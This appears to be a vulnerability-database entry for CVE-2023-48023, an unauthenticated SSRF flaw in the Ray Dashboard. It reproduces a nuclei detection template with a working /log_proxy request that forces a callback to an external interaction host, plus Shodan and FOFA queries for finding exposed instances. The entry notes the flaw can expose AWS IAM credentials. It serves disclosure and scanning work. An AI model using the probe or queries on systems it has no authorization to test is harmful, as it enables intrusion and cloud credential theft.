CVE-2023-48023: Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery

日期: 2025-08-01 | 影响软件: Anyscale Ray | POC: 已公开

漏洞描述

The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.

PoC代码[已公开]

id: CVE-2023-48023

info:
  name: Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery
  author: cookiehanhoan,harryha
  severity: critical
  description: |
    The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.
  impact: |
    The issue is exploitable without authentication and is dependent only on network connectivity to the Ray Dashboard port (8265 by default). The vulnerability could be exploited to retrieve the highly privileged IAM credentials required by Ray from the AWS metadata API. As an impact it is known to affect confidentiality, integrity, and availability.
  remediation: Update to the latest version
  reference:
    - https://bishopfox.com/blog/ray-versions-2-6-3-2-8-0
    - https://huntr.com/bounties/448bcada-9f6f-442e-8950-79f41efacfed/
    - https://security.snyk.io/vuln/SNYK-PYTHON-RAY-6096054
    - https://nvd.nist.gov/vuln/detail/CVE-2023-48023
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2023-48023
    cwe-id: CWE-441,CWE-918
    epss-score: 0.84942
    epss-percentile: 0.99301
  metadata:
    verified: true
    max-request: 1
    vendor: ray_project
    shodan-query:
      - http.favicon.hash:463802404
      - http.html:"ray dashboard"
    product: ray
    fofa-query:
      - icon_hash=463802404
      - body="ray dashboard"
  tags: cve,cve2023,ssrf,ray,anyscale,Anyscale

http:
  - method: GET
    path:
      - "{{BaseURL}}/log_proxy?url=http://{{interactsh-url}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - "<h1> Interactsh Server </h1>"
# digest: 4a0a00473045022100fdf6a2c3db6df25b196e3af40174c811dbd2f1bdcb1c25ad3400196aa411b759022062940c561b1ac1cedc558d547540c59a04591572587a50f64511193033a15850:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-48023.yaml

相关漏洞推荐